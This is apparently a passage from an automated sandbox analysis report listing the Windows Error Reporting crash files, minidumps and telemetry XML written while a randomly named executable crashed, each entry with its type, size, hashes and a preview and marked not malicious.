                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.7.1.8.2.9.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.6.9.9.9.5.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.2.f.3.c.5.c.-.0.1.0.8.-.4.8.2.f.-.8.f.2.0.-.7.1.d.a.3.e.f.e.a.5.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.8.5.5.2.d.e.-.0.6.4.4.-.4.e.5.d.-.a.0.e.d.-.a.f.6.1.d.9.c.4.f.b.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.4.-.3.5.0.1.-.6.f.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9502251030455972
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:QSF4ziBeV+7s2hJoI7JfPQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAENK:bZBek7q0BU/gjR9SMzuiFnZ24IO8xW
                                                                                                                                                                                                              MD5:7245BF2C922AF6282F4243BC5773DBC5
                                                                                                                                                                                                              SHA1:B984CFFF5B4A9009D938EF609FCFD0E2BAAB87B4
                                                                                                                                                                                                              SHA-256:51F3B17FF2BA8E04AB6C138BD0ED986A9B41019783515CB574008FEDDCC94EAF
                                                                                                                                                                                                              SHA-512:48ACA7BA25ED33F3A8734352B6C3E573D3FD3FC6B02F8399A5FA079F2483CA0FB7A8E894D5A4CD8733A094D06B4A37BA3B5E5D81A92209E5CF4FED56F1E6844C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.4.1.3.4.4.2.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.2.1.2.5.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.1.9.9.0.f.4.-.d.d.5.0.-.4.4.a.a.-.a.7.d.c.-.a.f.5.c.2.7.e.8.5.0.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.0.8.1.3.3.2.-.9.9.4.5.-.4.4.8.3.-.9.6.e.8.-.4.f.1.e.3.1.8.7.5.c.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.4.-.0.0.0.1.-.0.0.1.4.-.3.b.4.b.-.7.6.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:34 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):101586
                                                                                                                                                                                                              Entropy (8bit):1.8119397781139144
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:8zNAXQPz4cHsg2JdWVByeBzqAPSw6+8Na0vS/Wzg/Y:8Jf7HHsg2OCeUsSp+pQw
                                                                                                                                                                                                              MD5:ED65E85033DDCB6980E591477E2BFEF1
                                                                                                                                                                                                              SHA1:2D05D7004A2097227F0032039CC9B6E876BC05D2
                                                                                                                                                                                                              SHA-256:9CD5B5020D73079FE46FD65D28ABD6EB353754DB8CF2D458AC10341A74EE9546
                                                                                                                                                                                                              SHA-512:91536C10E495AD0A83DA07CB00464839A500669456596249FCFC4653C1218868794BD3188B9E962E0BDE39023C7A5E260DF57C776D2F65AB7D74B3BCFBC6DD6B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... .......&..f........................l...........$....B..........T.......8...........T........... "...j..........X...........D...............................................................................eJ..............GenuineIntel............T.......t......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:34 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):105842
                                                                                                                                                                                                              Entropy (8bit):1.883787973455189
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:0fXQPzgcRVsApTVfnaAc+j1LILJ7D3IHFv9:J7fRVsApTsH+RspM
                                                                                                                                                                                                              MD5:D6AC8200A8E8ABCC70ED44F2B988985C
                                                                                                                                                                                                              SHA1:8E29F970B8CAF102429F3883C267F050A910C469
                                                                                                                                                                                                              SHA-256:BBC47C2D8B2DBE9BC68C99D2002E0B608A03096F2896A72921A22278741E5465
                                                                                                                                                                                                              SHA-512:A90A66C0F173F210D547A3AD5C1F2CF8450CD64E73D3CCA7282A59CB790BA2AFB231B831E1F69941726D0B1A7570AABE7D5136E85350469131E3E2D95A238A91
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... .......&..f........................l................B..........T.......8...........T............!...{..........X...........D...............................................................................eJ..............GenuineIntel............T.......H......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8380
                                                                                                                                                                                                              Entropy (8bit):3.7092037197584102
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJo16S6Y9RSU9BFgmfOeprO89bcmsfDUm:R6lXJS6S6YrSU9BFgmfO8cFf1
                                                                                                                                                                                                              MD5:E9DE01B93A980D95191FB2D0DF5D6E74
                                                                                                                                                                                                              SHA1:5BD15CF6362D99409DEA341AD01F24915E8D3D88
                                                                                                                                                                                                              SHA-256:220388650CDEEC7097E8EB16EFC266202E002E23439C22C6F8F6F1223DCCD27D
                                                                                                                                                                                                              SHA-512:4A0B25DBE42F6F6B1B382C9436670847AE6E3E73A1E9B61852BC3EF4F2BD522BBC4AB4922465E047987198EC9A7910FE676195D09CA561104FC56EA3D7D10E5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.6.0.<./.P.i.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4649
                                                                                                                                                                                                              Entropy (8bit):4.525883075279318
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs/Jg77aI9cyyWpW8VYeUYm8M4J0qFy+q8ca01JLud:uIjfhI7iu7VDJ4RPLud
                                                                                                                                                                                                              MD5:DD4A7765752348C968AD4F6834726568
                                                                                                                                                                                                              SHA1:78F92A788FF8522DE13413AD6BC4E5F7788A4FCE
                                                                                                                                                                                                              SHA-256:8CB04C40C9630D69AA7A4C54AC2BAD3D23FBEDA24C5DA10B114A1466EA97EFA1
                                                                                                                                                                                                              SHA-512:16C90D5525A19C182022664D61295FB29A983B414952DD6963EFCDF55DBCCFC1697C78818EA070EA1491C5F8C6E799B5C7683A6C3355216E91AFAA14B6162D1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):80212
                                                                                                                                                                                                              Entropy (8bit):3.058672480383592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NOE03j+aGlxAuhqYVIR9xhLOjHZzQjRRIsroLkwvP:NOEej+aGfMg89xNMH94Ks8dvP
                                                                                                                                                                                                              MD5:E61375446B7E459491F8BA5A648476C5
                                                                                                                                                                                                              SHA1:ADBE2E5CCC3656D8EA744C1F12C2A931E02D46BE
                                                                                                                                                                                                              SHA-256:8200791CF320FA43D657DAEC25F574AB1C891F319BD53CF32D54230EDC008BF0
                                                                                                                                                                                                              SHA-512:648C606DA45B436598378F2B62DC0F33FB6B735AAAA00D86A7511FC1C340D9FA75939AA8AF7BAC05D6D8859AE62099A771912E1564F9547B2A9B541930F6BEB5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8380
                                                                                                                                                                                                              Entropy (8bit):3.7115124837894915
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJpk6A6Y9GSU9BFgmfOepr789bcUsfwUm:R6lXJq6A6Y8SU9BFgmfOXcHfi
                                                                                                                                                                                                              MD5:68FCE48D619EDA52C03DE112398A40CF
                                                                                                                                                                                                              SHA1:6C207849151D1F72DAD41642E326306654704C0A
                                                                                                                                                                                                              SHA-256:C58F0EE7BB3FECE5E929A178BE1628CB4B8FD5AD3853E5640679DA881CB68611
                                                                                                                                                                                                              SHA-512:433CA6A8B657340C3F9CFAF732FB0EDB515F4A0F43075B72D969EFE90B69F40FACC0260AB7F14666D6593E00DE3DEA08A99868F3D8D2EF5A85B13C6853BDF84C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.1.6.<./.P.i.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4649
                                                                                                                                                                                                              Entropy (8bit):4.523827552152781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs/Jg77aI9cyyWpW8VYe3Ym8M4J0qFX+q8cdI01JLJd:uIjfhI7iu7VgJZrlPLJd
                                                                                                                                                                                                              MD5:7EEA285B0F8A2E8B110BAF15126B7CB5
                                                                                                                                                                                                              SHA1:BBF4F3B5DA09476F0C9C243453D2C5AFA9BE50DB
                                                                                                                                                                                                              SHA-256:39CA7A6B8715697ACA3ED18EDA5236B96DC4224A0E09D10BEF4865AE2852C87F
                                                                                                                                                                                                              SHA-512:1010F3A43580D71465AB7BD2BA3353B11FB61E3DF9FFFD59175D17BDBA19458BB7ACC936BF4EE17C1E20FCCE3C1BBC0CF5BFC23090E8D05DBBF5ACD907AC9866
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):80220
                                                                                                                                                                                                              Entropy (8bit):3.0587310885490884
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:gxi2Hsm+aGlxAuhqYvIR9xhLOjYZBQjRRIsWJLPwn:gxi2Mm+aGfM689xNMYP4KsOsn
                                                                                                                                                                                                              MD5:72D7CA7CF6130DBE86FBF6887F3B3DD1
                                                                                                                                                                                                              SHA1:F5C96F59822B304880D595B7FB056BDBA9CD7176
                                                                                                                                                                                                              SHA-256:425AEDBA0FA2F356190D4B1B83601E71138317C7B4DF9960E1A6DD9908B9BAC3
                                                                                                                                                                                                              SHA-512:FE8CF2A99A4AC345773EFC9BC0B731A021D6C3E1CBA7395FA065279CB473658F36DB2E8CAF7E31E6D86DAE8CAB9153ACE41218A5427F5CFF3E2C2246ED998221
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:35 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103078
                                                                                                                                                                                                              Entropy (8bit):1.9796400625314967
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FXQPz8cesAPWKIY0/ZT3JC2G27y+sVgT5coL6XmUgXR5:+7TesqrMdCEyTq7Jb
                                                                                                                                                                                                              MD5:DFD7FD31649B9B64BAEEFE2FDA88D90B
                                                                                                                                                                                                              SHA1:A4C1BD281F6A05CA9A811CA663947F018593676F
                                                                                                                                                                                                              SHA-256:96FEAE87F16F95333FD92461E0B6AE28F345FB393C05F7CC5051A65887C41BBE
                                                                                                                                                                                                              SHA-512:BBC79684DFC9D4F16EF0961FEF04194CF44368BF90012B1D802293DC3B98943BC24D5421513E7FE9AE5CDCE365B10AE7A8C700390806343D1DF1DE67502B5DA5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... .......'..f........................l...........t....B..........T.......8...........T........... "...p..........X...........D...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                              Entropy (8bit):2.6849824284655335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:TiZYWuYr1q6aYQhY+WYjHSPYEZRgtHicIwIyw6CIpaiJ3af6MZJrIbA3:2ZDurVh0sCkaiJ3af6MZJkbA3
                                                                                                                                                                                                              MD5:8DCA02EDAB268D10724BF6689762F56F
                                                                                                                                                                                                              SHA1:B8BB1A8927428150319841283A80E19B76C7047B
                                                                                                                                                                                                              SHA-256:E8A02C5705B1E053A4EE174412A5D87B427586A14B11EE825326F35628552164
                                                                                                                                                                                                              SHA-512:8924459ABC41D82BE8DC8740908FB9AC9F32345663434C7E744189742C84CD50D45DFCF1F4C80BBCDB9ADB23253DFC10AFADE168CA7169BF566ED0D83502D84E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                              Entropy (8bit):2.685322671569264
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:TiZYWGklNXn6HYQtYtWHbHSPYEZQ7tHi/ItI1PwaONai3adMjJEIiA3:2ZDGnVtTq3iai3adMjJziA3
                                                                                                                                                                                                              MD5:858DFCA106F47A88C9F6CE8050B0DD1C
                                                                                                                                                                                                              SHA1:A0C0CC551BFF09FD24DF03021AC03917C95EC890
                                                                                                                                                                                                              SHA-256:347B74FBB5CB71F9429D3F41C6EFEAA03132EC1B330AC03CB4B8C64ED6754CF5
                                                                                                                                                                                                              SHA-512:4FC1E53FC2C44BA8BFD63D053DF5BFB1909DA44163B250E061557425B31319F0C6713BEB377C3841E470A8A4819B3D45A42957782405E7D0B84BCC3684DA1904
                                                                                                                                                                                                              Malicious:false
